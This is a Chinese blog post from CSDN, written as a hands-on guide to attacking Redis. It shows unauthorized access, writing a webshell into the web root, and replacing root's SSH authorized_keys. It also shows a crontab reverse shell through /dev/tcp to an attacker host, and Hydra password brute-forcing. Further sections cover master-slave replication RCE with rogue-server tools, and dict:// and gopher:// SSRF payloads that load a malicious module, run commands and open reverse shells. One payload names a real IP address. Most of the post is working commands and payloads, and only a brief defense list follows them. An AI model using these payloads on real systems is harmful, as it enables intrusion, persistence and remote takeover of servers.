Redis渗透&SSRF的利用-看这一篇就够了

已于 2024-03-13 12:47:34 修改
阅读量1.3k 收藏 29
点赞数 17
分类专栏: WEB安全 # SSRF 文章标签: redis 网络安全 SSRF web安全
于 2024-02-05 05:10:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53912233/article/details/136035252
版权

Redis是什么?

Redis是NoSQL数据库之一,它使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数据库。默认端口是:6379

工具安装

下载地址:

http://download.redis.io/redis-stable.tar.gz

然后进行配置:

cd redis-stable 
make //全局生效 
cp src/redis-cli /usr/bin/

成功后
image.png

Redis常用的命令

redis-cli -h ip -p port -a pass // 连接redis数据库,如果无密码
info // 返回关于Redis 服务器的各种信息和统计数值
info persistence // 主要查看后台有没有运行任务
flushall										    # 删除所有键
keys *											    # 查询所有键,也可用配合正则查询指定键
get 键名											  # 查询数据
del	键名											  # 删除数据
exists 键名										  # 判断键是否存在

config set protected-mode no # 关闭安全模式

slaveof host port						 # 设置主节点
config set protected-mode no # 关闭安全模式
config set dir /tmp					 # 设置保存目录
config set dbfilename exp.so # 设置保存文件名
config get dir							 # 查看保存目录
config get dbfilename			   # 查看保存文件名
save											   # 执行一个同步保存操作,将当前 Redis 实例的所有数据快照(snapshot)以 RDB 文件的形式保存到硬盘。
slaveof no one  						 # 断开主节点	
module list 								 #redis4.x版本以上有模块功能,查询有什么模块
module load exp.so		 			 #加载exp.so文件模块
quit												 #退出

Redis未授权

漏洞原因在于,没有设置密码,攻击者直接连接Redis数据库,进行操作。

redis-cli -h xx.xx.xx.xx -p 6379

redis-cli 默认访问6379端口,可以看见不需要密码,也能执行info操作,说明存在未授权漏洞
image.png

Redis的攻击面

如果没有权限,就会遇到如图类似的这个,无权限。反之则返回OK
image.png

web目录下写webshell

info persistence //获取关于 Redis 持久性配置和状态的信息
config set dir /var/www/html  // 设置要配置的目录
config set dbfilename cike.php  //设置要配置的文件名
set shell "\n\n\n<?php phpinfo();?>\n\n\n"  //设置键名还有键的值
save //最后保存
  • 使用 \n 是为了在 Redis 中正确表示和保留换行符,以确保保存和读取时的一致性。
  • 当 rdb_bgsave_in_progress:0 为0时,save才能保存成功。除非权限不够。
  • rdb_bgsave_in_progress为1时,表示当前已经有一个后台保存操作正在进行中

image.png
最后可以看见 php文件,写入网站成功

替换公钥

攻击机上生成key,id_rsa.pub文件就是我们要替换的

ssh-keygen -t rsa

image.png
然后将公钥导入key.txt文件(前后用\n\n换行,避免和Redis里其他缓存数据混合)

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt

image.png
这时候,我们将 key.txt 的公钥内容写入到目标主机的缓冲里:

cat key.txt| redis-cli -h xx.xx.xx.xx -x set ssh

image.png
连接目标主机的Redis,可以看见刚刚写入的ssh键值数据还在

get ssh  //查看ssh键名数据是否存在

image.png
然后执行以下命令:

config set dir /root/.ssh // 设置可写目录
config set dbfilename authorized_keys  //设置可写的键名
save //保存
keys * //查看存在的键名

image.png

通过crontab写反弹shell

连接redis后,使用以下命令

set cike "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/attack_ip/port 0>&1\n\n" //设置cike键名及值
config set dir /var/spool/cron // 使用centos的定时任务目录,ubuntu的为/var/spool/cron/crontabs目录
config set dbfilename shell //设置可写的文件名
save //保存

image.png
keys * 查看存在的键名,可以发现cike写入成功
image.png

使用Hydra爆破Redis密码

hydra -P passwd.txt redis://xx.xx.xx.xx

Redis主从复制导致RCE

漏洞原理

可以大概这样子理解,我们做主机,目标做从机。漏洞版本的范围是在 redis_version: 4.x-5.x之间
在Reids 4.x之后,Redis新增了模块功能,通过外部拓展,可以自定义新的的Redis命令,要通过写c语言并编译出.so文件才可以。
我们可以通过手法来上传so文件,这时候redis的module命令进行加载.so文件,就可以执行一些敏感命令。

远程主从复制

Redis运行远程服务器进行连接的时候,就叫做远程主从复制
使用以下工具:

https://github.com/n0b0dyCN/redis-rogue-server

利用方式:

python3 redis-rogue-server.py --rhost target_ip --lhost attack_ip

image.png
如果目标Redis服务开启了认证功能,可以添加 --passwd 参数

python3 redis-rogue-server.py --rhost target_ip --lhost attack_ip --passwd 123456

本地主从复制

当Redis数据库,只允许本地127.0.0.1进行连接,这时候就叫本地主从复制。

dict+ssrf(未授权)

dict协议通常用于探测端口毕竟方便,可以看见有回显
image.png
如果是http探测则会一直连接
image.png
通常使用dict协议爆破密码

?url=dict://0.0.0.0:6379/AUTH:root  //密码认证:root,可以利用这个爆破密码

可以看见返回了OK
image.png
如果是密码错误则如图
image.png
dict协议只能执行一条redis命令,通常用于未授权的redis操纵比较好

?url=dict://0.0.0.0:6379/SLAVEOF:107.149.212.113:15000 //连接我们的主机ip及设置的端口
?url=dict://0.0.0.0:6379/CONFIG:SET:dir:/tmp/
?url=dict://0.0.0.0:6379/config:set:dbfilename:exp.so  
?url=dict://0.0.0.0:6379/MODULE:LOAD:/tmp/exp.so  //加载exp.so
?url=dict://0.0.0.0:6379/slaveof:no:one  //断开主从
?url=dict://0.0.0.0:6379/system.exec:whoami //命令执行
?url=dict://0.0.0.0:6379/system.rev xx.xx.xx.xx 4444 //反弹shell

gopher+ssrf(密码认证)

gopher协议的优点是可以执行多行命令,可以一次性执行完要执行的命令。
空格二次编码后为%2520,换行符二次编码后为%250a;需要在每条命令后加上换行符

gopher://0.0.0.0:6379/_AUTH%2520(密码)%250a(执行的redis命令)%250aquit 

//执行不同的命令需要换行符加上%250a

主从复制的payload:

gopher://0.0.0.0:6379/_AUTH%2520root%250ainfo%250aquit //查看服务器信息,及进行密码root验证登录息,及进行密码root验证登录
gopher://0.0.0.0:6379/_AUTH%2520root%250aSLAVEOF xx.xx.xx.xx 1111%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aCONFIG SET dir /tmp/%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aconfig set dbfilename exp.so%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aMODULE LOAD /tmp/exp.so%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250asystem.exec whoami%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250asystem.rev xx.xx.xx.xx 4444%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aslaveof no one%250aquit

image.png
这里使用这个工具做个例子演示,配合上面的payload进行本地主从复制:

https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server

攻击端:

python3 redis_rogue_server.py -v -path exp.so -lport 1111
// 开启主机以及端口,让redis连接这个主机,获取exp.so

image.png
这时候,我们在客户端输入之前的payload:gopher+ssrf,就可以利用了
关于其他的工具:

https://github.com/xmsec/redis-ssrf  //ssrf+gopher
https://github.com/firebroo/sec_tools //gopher 编码payload

防御

  • redis.conf的requirepass更改密码为强密码,防止未授权
  • redis.conf的port进行默认端口更改
  • 不以高权限用户运行redis,如root
  • protected-mode 设置开启保护模式
cike_y
关注
  • 17
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
利用SSRF的gopherRedis未授权(.py版)
qq_44324297的博客
07-13 189
利用SSRF的gopherRedis未授权(.py版) docker,lamp
redis数据类型八股文,看这一篇就够
最新发布
05-05
redis数据类型八股文,看这一篇就够
渗透测试中,探测到6379端口,你打算怎么利用
vivlol918的博客
08-28 2530
6379端口是Redis数据库的默认端口号。Redis是一种基于键值对的内存数据库,具有高性能和灵活的数据存储和检索功能。
Redis漏洞及搭配ssrf利用姿势
zkaqlaoniao的博客
04-25 649
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!
SSRF中Redis利用
2301_80127209的博客
01-23 1124
SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统(因为请求是由服务端帮我们发起的,所以我们可以通过它来向其所在的内网机器发起请求)。Gopherus下载地址自己手动把攻击语句转换成Gopher协议的格式会很麻烦,这款工具里面内置了一些早就写好的利用语句,我们只需要学会如何使用它就可以很方便的写出一些我们需要的利用语句。
SSRF打Redis
weixin_44843084的博客
06-06 808
SSRF打Redis https://www.cnblogs.com/linuxsec/articles/11221756.html https://www.cnblogs.com/-chenxs/p/11749367.html 1.探测端口 http://xxx.xxx.xx.xx/xx/xx.php?url=http://目标:6379 如果探测到6379端口,那么可以利用http、gopher、dict这几个协议来打开放6379端口的redis服务, 原理是利用他们以目标机的身份执行对开启redis
ssrf+redis
qq_45213259的博客
11-30 3762
ssrf+redis 实验环境 靶机:ubuntu16.04 ip:192.168.211.130 在靶机中搭建lamp环境、安装redis、安装ssh 攻击机:kali2020 ip:192.168.211.134 在攻击机中安装redis vps:windows10(本机) ip:10.133.164.81 在windows中安装cn.exe 实验步骤 1.将ssrf.php文件放在web根目录下 ssrf.php: <?php $ch = curl_init(); curl_set
SSRF攻击Redis
cosmoslin的博客
10-27 1328
Redis简介 Redis是数据库的意思。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set –有序集合)和hash(哈希类型)。这些数据类型都支持p
redis-stack-server 7.2.0 安装包合集
04-03
redis-stack-server-7.2.0-v9.arm64.snap redis-stack-server-7.2.0-v9.bionic.arm64.tar.gz redis-stack-server-7.2.0-v9.bionic.x86_64.tar.gz redis-stack-server-7.2.0-v9.bullseye.x86_64.tar.gz redis-stack-...
Redis-7.0.13-Windows-x64-with-Service
10-06
Upgrade urgency SECURITY: See security fixes below. ...subsequent failover or node joining (redis/redis#12344) Ensure that the function load timeout is disabled during loading from RDB/AOF and on repli
Redis-x64-3.0.504&Redis;-x64-3.2.100&redis;-desktop-manager-0.9.3.817
01-28
windows系统redis安装文件,Redis-x64-3.0.504(稳定版);Redis-x64-3.2.100(预发行版);redis-desktop-manager-0.9.3.817(redis界面工具)。具体安装方法详见:...
Redis这篇就够
02-24
Redis是完全开源免费的,遵守BSD协议,是一个高性能的key-value数据库Redis与其他key-value缓存产品有以下三个特点:Redis支持数据持久化,可以将内存中的数据保存在磁盘中,重启的时候可以再次加载进行使用。Redis...
SSRF+Redis组合拳啊哒~
qq_43665434的博客
04-02 1470
SSRF+Redis组合拳 好雨知时节,当春乃发生。(就是有点冷) 实验环境 主机 角色 描述 centos8 受害服务器 运行redis数据库,且含有redis未授权访问漏洞 window10 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf+redis未授权访问获取centos8的shell 工具: Redis nc wireshark tcpdump Redis基础 1、序列化协议 客户端-服务端之间交互的是序列化后的协议数据。在Redis中,协议数据分为
SSRF在Redis中反弹shell
weixin_34126215的博客
05-27 990
搭个环境怪不容易的,求大佬们放过。。。 参考文献:https://joychou.org/web/phpssrf.htmlhttps://www.anquanke.com/post/id/146417 SSRF概念 SSRF(Server-Side Request Forgery),服务端请求伪造,利用漏...
RedisSSRF中的应用
feng的博客
10-06 1293
偶然找到的一篇文章,觉得写的很不错。本来只是收藏而不是转载,但是我发现这篇文章的原文已经挂了,因此就转载了过来。
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 1547
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
SSRF——手把手教你Redis反弹Shell
sudu2020dd的博客
06-04 2539
由于业务运行的服务器处于内外网边界,并且可通过利用当前的这台服务器,根据所在的网络,访问到与外部网络隔离的内网应用,所以一般情况下,SSRF漏洞的攻击目标是攻击者无法直接访问的内网系统。因为攻击Redis A之前,首先需要构造一个样本,如何构造,通过在kali本地搭建一个Redis B,作为本地测试,形成攻击链后将他的格式转换为gopher协议,然后测试完毕后,应用在真实攻击上,将gopher协议数据包发送给存在SSRF漏洞的机器实现攻击,转给Redis A,写一个计划任务,反弹shell,往kali弹。
shiro-redis-spring-boot-starter
10-06
shiro-redis-spring-boot-starter是一个用于集成Apache Shiro和Redis的Spring Boot Starter项目。Apache Shiro是一个强大而灵活的Java安全框架,用于身份验证、授权和会话管理等安全功能。而Redis是一个高性能的内存数据库,其具有快速的数据存取能力和持久化支持。 shiro-redis-spring-boot-starter提供了一种简化和快速集成Shiro和Redis的方式,使得在Spring Boot应用中实现安全功能变得更加容易。通过使用该Starter,我们可以方便地将Shiro的会话管理功能存储到Redis中,从而支持分布式环境下的会话共享和管理。 使用shiro-redis-spring-boot-starter可以带来以下好处: 1. 分布式环境的会话共享:通过将Shiro的会话数据存储到Redis中,不同的应用节点可以共享同一个会话,从而实现分布式环境下的会话管理和跨节点的身份验证和授权。 2. 高可用性和性能:Redis作为一个高性能的内存数据库,具有出色的数据读写能力和持久化支持,可以提供可靠的会话存储和高性能的数据访问能力。 3. 简化配置和集成:shiro-redis-spring-boot-starter提供了封装好的配置和集成方式,减少了我们自己实现集成的复杂性和工作量。 总结来说,shiro-redis-spring-boot-starter为我们提供了一种简化和快速集成Shiro和Redis的方式,使得在Spring Boot应用中实现安全功能变得更加容易和高效。通过它,我们可以实现分布式环境下的会话共享和管理,提供高可用性和性能的数据存取能力,同时简化了配置和集成的复杂性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cike_y

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值